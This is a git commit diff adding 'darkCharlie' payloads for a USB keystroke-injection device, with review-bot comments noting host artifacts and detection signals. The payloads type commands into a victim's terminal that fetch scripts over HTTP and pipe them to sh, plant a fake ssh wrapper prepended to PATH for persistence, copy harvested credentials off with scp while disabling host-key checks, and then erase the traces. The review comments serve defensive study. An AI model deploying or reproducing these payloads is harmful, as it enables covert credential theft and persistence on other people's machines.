Now with injection and cleaning
parent
0f4129b124
commit
77b1a4e123
|
@ -0,0 +1,66 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
# Title: darkCharlie{Cleaner}
|
||||||
|
# Author: Michael Weinstein
|
||||||
|
# Target: Mac/Linux
|
||||||
|
# Version: 0.1
|
||||||
|
#
|
||||||
|
# Get the ssh creds from our loot collection.
|
||||||
|
# And clean up after
|
||||||
|
#
|
||||||
|
# White | Ready
|
||||||
|
# Blue blinking | Attacking
|
||||||
|
# Green | Finished
|
||||||
|
|
||||||
|
LED SETUP
|
||||||
|
|
||||||
|
#setup the attack on macos (if false, attack is for Linux)
|
||||||
|
mac=false
|
||||||
|
|
||||||
|
if [ "$mac" = true ]
|
||||||
|
then
|
||||||
|
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
|
||||||
|
else
|
||||||
|
ATTACKMODE ECM_ETHERNET HID
|
||||||
|
fi
|
||||||
|
|
||||||
|
DUCKY_LANG us
|
||||||
|
|
||||||
|
GET SWITCH_POSITION
|
||||||
|
GET HOST_IP
|
||||||
|
|
||||||
|
cd /root/udisk/payloads/$SWITCH_POSITION/
|
||||||
|
LOOT=/root/udisk/loot/darkCharlie
|
||||||
|
mkdir -p $LOOT
|
||||||
|
|
||||||
|
LED ATTACK
|
||||||
|
|
||||||
|
if [ "$mac" = true ]
|
||||||
|
then
|
||||||
|
RUN OSX terminal
|
||||||
|
else
|
||||||
|
RUN UNITY xterm
|
||||||
|
fi
|
||||||
|
QUACK DELAY 2000
|
||||||
|
|
||||||
|
QUACK STRING scp -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no \~/.config/ssh/ssh.conf root@$HOST_IP:$LOOT/\$USER.sudo.passwd #nice hiding of known host info
|
||||||
|
QUACK DELAY 200
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
QUACK STRING hak5bunny
|
||||||
|
QUACK DELAY 200
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 500
|
||||||
|
if [ "$mac" = true ]
|
||||||
|
then
|
||||||
|
QUACK STRING rm -rf \~/.config/ssh \&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bash_profile
|
||||||
|
else
|
||||||
|
QUACK STRING rm -rf \~/.config/ssh \&\& sed -i \'/export PATH=\\~\\/.config\\/ssh:/d\' \~/.bashrc
|
||||||
|
fi
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 200
|
||||||
|
QUACK STRING exit
|
||||||
|
QUACK DELAY 200
|
||||||
|
QUACK ENTER
|
||||||
|
LED SUCCESS
|
||||||
|
#See you, space cowboy...
|
|
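Review bot: The header block (the `# Title` … `# Green | Finished` comments) says only "clean up after" and never lists which host-side paths the typed commands touch, so anyone auditing a machine has to reconstruct them from the `QUACK STRING` lines. From the visible lines these are `~/.config/ssh/ssh.conf` (copied off by `scp` with host-key checking disabled), the `~/.config/ssh` directory (removed), and the `export PATH=~/.config/ssh:` line in `~/.bashrc` or `~/.bash_profile` (deleted by `sed`). A header line such as `# Host artifacts: ~/.config/ssh/, PATH line in ~/.bashrc or ~/.bash_profile` would record that. For detection, the observable worth alerting on is a newly enumerated USB Ethernet+keyboard device (`ATTACKMODE ECM_ETHERNET HID`) followed by an `scp` run carrying `-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no`, because the last typed command removes the directory and the PATH line afterwards.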
@ -0,0 +1,79 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
# Title: darkCharlie
|
||||||
|
# Author: Michael Weinstein
|
||||||
|
# Target: Mac/Linux
|
||||||
|
# Version: 0.1
|
||||||
|
#
|
||||||
|
# Create a wrapper for ssh sessions that
|
||||||
|
# will live inside ~/.config/ssh and be added
|
||||||
|
# tn the $PATH.
|
||||||
|
#
|
||||||
|
# This payload was inspired greatly by SudoBackdoor
|
||||||
|
# and much of the code here was derived (or copied
|
||||||
|
# wholesale) from that with great thanks to oXis.
|
||||||
|
#
|
||||||
|
# White | Ready
|
||||||
|
# Amber blinking | Waiting for server
|
||||||
|
# Blue blinking | Attacking
|
||||||
|
# Green | Finished
|
||||||
|
|
||||||
|
LED SETUP
|
||||||
|
|
||||||
|
#setup the attack on macos (if false, attack is for Linux)
|
||||||
|
mac=false
|
||||||
|
|
||||||
|
if [ "$mac" = true ]
|
||||||
|
then
|
||||||
|
ATTACKMODE ECM_ETHERNET HID VID_0X05AC PID_0X021E
|
||||||
|
else
|
||||||
|
ATTACKMODE ECM_ETHERNET HID
|
||||||
|
fi
|
||||||
|
|
||||||
|
DUCKY_LANG us
|
||||||
|
|
||||||
|
GET SWITCH_POSITION
|
||||||
|
GET HOST_IP
|
||||||
|
|
||||||
|
cd /root/udisk/payloads/$SWITCH_POSITION/
|
||||||
|
|
||||||
|
# starting server
|
||||||
|
LED SPECIAL
|
||||||
|
|
||||||
|
iptables -A OUTPUT -p udp --dport 53 -j DROP
|
||||||
|
python -m SimpleHTTPServer 80 &
|
||||||
|
|
||||||
|
# wait until port is listening (credit audibleblink)
|
||||||
|
while ! nc -z localhost 80; do sleep 0.2; done
|
||||||
|
# that was brilliant!
|
||||||
|
|
||||||
|
LED ATTACK
|
||||||
|
|
||||||
|
if [ "$mac" = true ]
|
||||||
|
then
|
||||||
|
RUN OSX terminal
|
||||||
|
else
|
||||||
|
RUN UNITY xterm
|
||||||
|
fi
|
||||||
|
QUACK DELAY 2000
|
||||||
|
|
||||||
|
if [ "$mac" = true ]
|
||||||
|
then
|
||||||
|
QUACK STRING curl "http://$HOST_IP/pre.sh" \| sh
|
||||||
|
QUACK STRING curl "http://$HOST_IP/darkCharlie.py" \> ~/.config/ssh/ssh
|
||||||
|
QUACK STRING curl "http://$HOST_IP/post.sh" \| sh
|
||||||
|
QUACK STRING ~/.config/ssh/ssh --initializeScript
|
||||||
|
else
|
||||||
|
QUACK STRING wget -O - "http://$HOST_IP/pre.sh" \| sh #I think wget defaults to outputting to a file and needs explicit instructions to output to STDOUT
|
||||||
|
QUACK STRING wget -O - "http://$HOST_IP/darkCharlie.py" \> ~/.config/ssh/ssh #Will test this on a mac when I finish up
|
||||||
|
QUACK STRING wget -O - "http://$HOST_IP/post.sh" \| sh
|
||||||
|
QUACK STRING ~/.config/ssh/ssh --initializeScript
|
||||||
|
fi
|
||||||
|
|
||||||
|
QUACK DELAY 200
|
||||||
|
QUACK ENTER
|
||||||
|
QUACK DELAY 200
|
||||||
|
QUACK STRING exit
|
||||||
|
QUACK DELAY 200
|
||||||
|
QUACK ENTER
|
||||||
|
LED SUCCESS #The Dungeons and Dragons tattoo hath rolled a 20
|
|
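Review bot: The header comment has a typo (`# tn the $PATH.` should read `# to the $PATH.`) and describes the wrapper only in general terms, without naming what ends up on the host. Per the `QUACK STRING` lines, that is a file named `ssh` under `~/.config/ssh/`, fetched over plain HTTP from `$HOST_IP`, with `pre.sh` and `post.sh` piped directly into `sh`. A responder would hunt for two things: an executable in a home directory whose name shadows a system tool, and a `curl … | sh` or `wget -O - … | sh` against the address of a just-attached USB network interface. I would state this in the header, e.g. `# Host artifacts: ~/.config/ssh/ssh, PATH entry in shell startup file`. Restricting which USB device classes may enumerate on unattended or locked machines is the mitigation that applies before any of these lines run.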
@ -0,0 +1,9 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
chmod u+x ~/.config/sudo/sudo
|
||||||
|
if [ -f ~/.bash_profile ]
|
||||||
|
then
|
||||||
|
echo "export PATH=~/.config/ssh:$PATH" >> ~/.bash_profile
|
||||||
|
else
|
||||||
|
echo "export PATH=~/.config/ssh:$PATH" >> ~/.bashrc
|
||||||
|
fi
|
|
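Review bot: This file has no comment at all, although its two `echo … >> ~/.bash_profile` / `>> ~/.bashrc` lines are the persistence step: they put a user-writable directory ahead of the system directories in `PATH`. A one-line header such as `# Prepends ~/.config/ssh to PATH via the user's shell startup file` would make that explicit. Because `$PATH` sits inside double quotes it is expanded when the line is written, while `~` is not. The stored line therefore begins with the literal text `export PATH=~/.config/ssh:` followed by the PATH value of that moment, and that prefix is the string to search startup files for. Integrity monitoring on `~/.bashrc` and `~/.bash_profile`, plus a check for home-directory entries at the front of `PATH`, covers this technique generally.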
@ -0,0 +1,11 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
if [ ! -d ~/.config/ssh ]
|
||||||
|
then
|
||||||
|
mkdir -p ~/.config/ssh
|
||||||
|
fi
|
||||||
|
|
||||||
|
if [ -f ~/.config/ssh/ssh ]
|
||||||
|
then
|
||||||
|
rm ~/.config/ssh/ssh
|
||||||
|
fi
|